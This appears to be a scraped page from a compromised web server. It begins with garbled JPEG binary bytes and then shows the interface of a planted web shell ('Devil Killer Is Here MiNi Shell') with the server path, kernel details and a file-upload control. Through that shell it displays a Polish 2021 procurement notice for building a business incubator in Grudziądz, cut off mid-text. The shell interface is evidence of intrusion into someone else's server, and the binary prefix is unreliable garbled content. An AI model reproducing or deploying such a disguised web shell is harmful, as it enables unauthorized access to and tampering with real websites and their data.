JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210423/0003939501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00039395 z dnia 2021-04-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa Inkubatora Przedsiębiorczości budynku biurowo-usługowego wraz z niezbędną infrastrukturą techniczną, wraz z systemem sterowania budynkiem (...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Grudziądzki Park Przemysłowy Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 340009029</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Waryńskiego 32-36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grudziądz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gz@gpp.grudziadz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/gpp_grudziadz</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa Inkubatora Przedsiębiorczości budynku biurowo-usługowego wraz z niezbędną infrastrukturą techniczną, wraz z systemem sterowania budynkiem (...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-795440db-a3a8-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00039395</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn.: „Budowa Inkubatora Przedsiębiorczości celem zapewnienia lepszych warunków rozwoju MŚP w m. Grudziądz” nr RPKP.01.04.03-04-0004/20, współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gpp_grudziadz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/gpp_grudziadz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w Postępowaniu odbywa się przy użyciu środków komunikacji elektronicznej.2.Zamawiający informuje, iż będzie komunikował się z wykonawcami za pomocą Platformy zakupowej:https://platformazakupowa.pl/pn/gpp_grudziadz .3. Zamawiający informuje, iż w zakresie pytańdotyczących funkcjonowania Platformy zakupowej należy kontaktować się z Centrum Wsparcia Klientaplatformazakupowa.pl pod numer 22 1010202, cwk@platformazakupowa.pl.4. Wymagania techniczne iorganizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane zostały wRegulaminie platformazakupowa.pl (https://platformazakupowa.pl/strona/1-regulamin). 5. Zamawiającyokreśla wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie zakupowej:6. stałydostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,7. komputer klasyPC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jegonowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ichnowsze wersje,8. zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorerminimalnie wersja 10 0.,9. włączona obsługa JavaScript,10. zainstalowany program Adobe AcrobatReader lub inny obsługujący format plików .pdf11. Platforma działa według standardu przyjętego wkomunikacji sieciowej - kodowanie UTF8,12. Oznaczenie czasu odbioru danych przez platformęzakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwerasynchronizowanego z zegarem Głównego Urzędu Miar.13. Maksymalny rozmiar jednego plikuprzesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania ofertywynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB. 14. Zamawiającyinformuje, że instrukcje korzystania z Platformy zakupowej znajdują się w zakładce „Instrukcje dlaWykonawców" na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.15. Wykonawca, przystępując do niniejszego Postępowania:16. akceptuje warunki korzystania zplatformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem wzakładce „Regulamin" oraz uznaje go za wiążący,17. zapoznał i stosuje się do Instrukcji składaniaofert/wniosków dostępne pod linkiem:https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ogólnego rozporządzenia o ochroniedanych osobowych z dnia 27 kwietnia 2016 r. (Dz. Urz. UE L 1 19 z 04.05.2016) Zamawiającyinformuje, że:1. Administratorem Pani/Pana danych osobowych jest Grudziądzki Park PrzemysłowySpółka z ograniczoną odpowiedzialnością z siedzibą w Grudziądzu przy ul. Waryńskiego 32-36, zwanadalej Administratorem; Administrator prowadzi operacje przetwarzania Pani/Pana danych osobowych,e-mail: gpp@gpp.grudziadz.pl2. Pani/Pana dane osobowe będą przechowywane przez cały okresprzechowywania dokumentacji z przeprowadzonego postępowania o udzielenie przedmiotowegozamówienia oraz przez cały okres realizacji umowy w przypadku wyboru Pani/Pana oferty jakonajkorzystniejszej i po jej rozwiązaniu, do czasu upływu terminu ewentualnych roszczeń wynikających zumowy.3. Podanie Spółce danych osobowych w zakresie obowiązujących przepisów ustaw i wydanychna ich podstawie aktów wykonawczych jest obowiązkowe oraz niezbędne do przeprowadzenianiniejszego postępowania o udzielenie zamówienia publicznego w przypadku niepodania danychniemożliwe jest złożenie oferty oraz zawarcie umowy, w pozostałych przypadkach dobrowolne.4.odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostaniedokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.5. Pani/Pana dane osobowe będąprzechowywane, zgodnie z art. 78ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia postępowania oudzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywaniaobejmuje cały czas trwania umowy.6. Osobie fizycznej, której dane dotyczą, przysługuje prawożądania od administratora dostępu do danych osobowych, do ich sprostowania lub ograniczeniaprzetwarzania – na zasadach określonych w RODO oraz w innych obowiązujących w tym zakresieprzepisów prawa.7. Osobie fizycznej, której dane dotyczą przysługuje prawo do wniesienia skargi doorganu nadzorczego – Prezesa Urzędu Ochrony Danych Osobowych, gdy uzasadnione jest, iż daneosobowe przetwarzane są przez administratora niezgodnie z przepisami RODO.8. W odniesieniu dodanych decyzje nie będą podejmowane w sposób zautomatyzowany.9. Dane niepozyskanebezpośrednio od osób, których dotyczą, obejmują w szczególności następujące kategorie danych: imięi nazwisko, dane kontaktowe, stosowne uprawnienia do wykonywania określonych czynności, danewynikające z umów o pracę oraz innej dokumentacji związanej z kontrolą realizacji przez Wykonawcęobowiązku zatrudnienia na podstawie umowy o pracę.10. Źródłem pochodzenia danych osobowychniepozyskanych bezpośrednio od osoby, której dane dotyczą jest Wykonawca.11. Wykonawcazobowiązuje się poinformować, w imieniu Zamawiającego, wszystkie osoby fizyczne, których daneosobowe będą przekazywane Zamawiającemu:1) o fakcie przekazania danych osobowychZamawiającemu;2) o tym, że dane osobowe będą przetwarzane przez Zamawianego;3) o treściklauzuli informacyjnej wskazanej w ust. 2.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PN/04/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1. Przedmiotem zamówienia jest: Kompleksowa budowa Inkubatora Przedsiębiorczościbudynkubiurowo-usługowego wraz z niezbędną infrastrukturą techniczną, wraz z systememsterowania budynkiem oraz niezbędnym do tego systemu sprzętem teleinformatycznym wraz zwyposażeniem multimedialnym, wykonaniem stałej zabudowy meblowej oraz zielenią ielementami zagospodarowaniem terenu. Serwis i konserwacja: urządzeń, systemów, instalacji wokresie gwarancji. UWAGA do przedmiotu umowy nie wchodzi wyposażenie meblowe ruchomeopisane w punkcie ST 01.16. Wyposażenie punkt 2.4. STWIOR część szczegółowa. 1.2.Budowa, o której mowa w punkcie 6.1 SWZ zlokalizowana jest przy Al. 23 Stycznia / ul.Toruńskiej w Grudziądzu na działkach:1.2.1. Budynek wraz z zagospodarowaniem terenu dz. nr:63/1, 63/2, 64, 65 obręb 050 M. Grudziądz,1.2.2. Zjazd, dojścia, usunięcie kolizjiteletechnicznych i przyłącza wodno-kanalizacyjne i kanalizacji deszczowej dz. nr: 92, 93/4 obręb050 M. Grudziądz.1.3. Zakres przedmiotu zamówienia obejmuje w szczególności:1.3.1.Rozbiórkę istniejących obiektów i elementów zagospodarowania terenu.1.3.2. Usunięcie kolizji zwyłączeniem instalacji elektroenergetycznej eDNc oraz rozbiórkę istniejących instalacji. 1.3.3.Kompleksową budowę budynku Inkubatora Przedsiębiorczości (budynku biurowo-usługowego)wraz z instalacjami i wyposażeniem stałym (stała zabudowa meblowa).1.3.4. Kompleksowezagospodarowanie terenu wraz z instalacjami, przyłączami, ogrodzeniem, bramami, zjazdem,dojściami, zielenią i małą architekturą.1.3.5. Usługi geotechniczne i geodezyjne konieczne doprawidłowego wykonania robót wraz opracowaniem wielobranżowej dokumentacjipowykonawczej.1.3.6. Kompleksowy serwis i konserwację: urządzeń, systemów, instalacji wokresie gwarancji zgodnie z warunkami, instrukcji, wytycznych producentów lub DTR urządzeńwraz z zapewnieniem materiałów eksploatacyjnych.1.3.7. Dostawę:1.3.7.1. Systemu SMSopisanegomiędzy innymi w ST.05.01 pkt 2.2.10, opis elektryczny pkt 3.7.11,1.3.7.2. SystemuBMS wraz z serwerem, oprogramowaniem, komputerem- opisanego między innymi w ST.05.01pkt 2.2.11, opis elektryczny pkt 3.7.12,1.3.7.3. Systemu telewizji przemysłowej CCTV, kamery –opisanego między innymi w ST.05.01 pkt 2.2.6, opis elektryczny pkt 3.7.6,1.3.7.4. Systemuoddymiania klatek schodowych- opisanego między innymi w ST.05.01 pkt 2.2.2, opis elektrycznypkt 3.7.2,1.3.7.5. Rzutnika i ekranów multimedialnych– elementy składowe Systemuaudiowizualnego, opisane między innymi w ST.05.01 pkt 2.2.7, opis elektryczny pkt 3.7.8.Szczegółowy opis przedmiotu zamówienia określony został w załącznikach nr 1a-1p do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30211000-1 - Komputery wysokowydajne</p> <p class="mb-0">30237240-3 - Kamera internetowa</p> <p class="mb-0">32322000-6 - Urządzenia multimedialne</p> <p class="mb-0">38431000-5 - Aparatura do wykrywania</p> <p class="mb-0">38653400-1 - Ekrany projekcyjne</p> <p class="mb-0">39100000-3 - Meble</p> <p class="mb-0">42961000-0 - System sterowania i kontroli</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">48820000-2 - Serwery</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z Rozdziałem 16 SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:1.nie podlegają wykluczeniu,2.spełniają następujące warunki udziału w postępowaniu:1)posiadają zdolność do występowania w obrocie gospodarczym tj. Zamawiający nie określa tego warunku. 2)posiadają uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów tj. Zamawiający nie określa tego warunku. 3) znajdują się sytuacji ekonomicznej lub finansowej tj. a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia na sumę gwarancyjną w wysokości co najmniej 10.000.000,00 zł (słownie: dziesięć milionów złotych);4)posiadają zdolności techniczne lub zawodowe, tj. a) Wykonawca wykonał należycie nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie, które obejmowało wykonanie robót budowlanych polegających na budowie budynku handlowo – usługowego, biurowego (według Polskiej Klasyfikacji Obiektów Budowlanych) lub użyteczności publicznej (według Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie) o powierzchni użytkowej nie mniejszej niż: 2000 m 2. Zamawiający dopuszcza również sytuację, w której Wykonawca wykonał należycie budowę dwóch budynków: handlowo – usługowych lub biurowych (według Polskiej Klasyfikacji Obiektów Budowlanych) lub użyteczności publicznej (według Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie), które łącznie będą miały powierzchnię nie mniejszą niż 2000 m2,b) dysponuje osobami zdolnymi do wykonania zamówienia, którzy będą brali udział w realizacji zamówień, to jest osobami uprawnionymi do wykonywania samodzielnych funkcji technicznych w budownictwie, posiadającymi uprawnienia budowlane bez ograniczeń do:-	kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej Wymogiem Zamawiającego jest dysponowanie przez wykonawcę co najmniej jedną osobą o ww. uprawnieniach, która będzie pełnić funkcję kierownika budowy. Kierownik budowy musi wykazać się realizacją minimum dwóch robót budowlanych na stanowisku kierownika budowy, w tym minimum jednej roboty, której przedmiotem była budowa obiektu budowlanego o powierzchni użytkowej nie mniejszej niż: 2.000 m2-	kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.Wymogiem Zamawiającego jest dysponowanie przez wykonawcę co najmniej jedną osobą o ww. uprawnieniach, która będzie pełnić funkcję kierownika robót elektrycznych i elektroenergetycznych - kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń.Wymogiem Zamawiającego jest dysponowanie przez wykonawcę co najmniej jedną osobą o ww. uprawnieniach, która będzie pełnić funkcję kierownika robót sanitarnych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca przedkłada następujące dokumenty:1) informacji z Krajowego Rejestru Karnego w zakresie:a) art. 108 ust. 1 pkt 1 i 2 Ustawy,b) art. 108 ust. 1 pkt 4 Ustawy, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego,c) art. 109 ust. 1 pkt 2 lit. a Ustawy,d) art. 109 ust. 1 pkt 2 lit. b Ustawy, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu,e) art. 109 ust. 1 pkt 3 Ustawy, dotyczącej skazania za przestępstwolub ukarania za wykroczenie, za które wymierzono karę aresztu- sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;2) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samejgrupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej; oświadczenie może być przygotowane według wzoru stanowiącego Załącznik nr 8 do SWZ,3) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega zopłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 Ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążąceporozumienie w sprawie spłat tych należności;4) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia 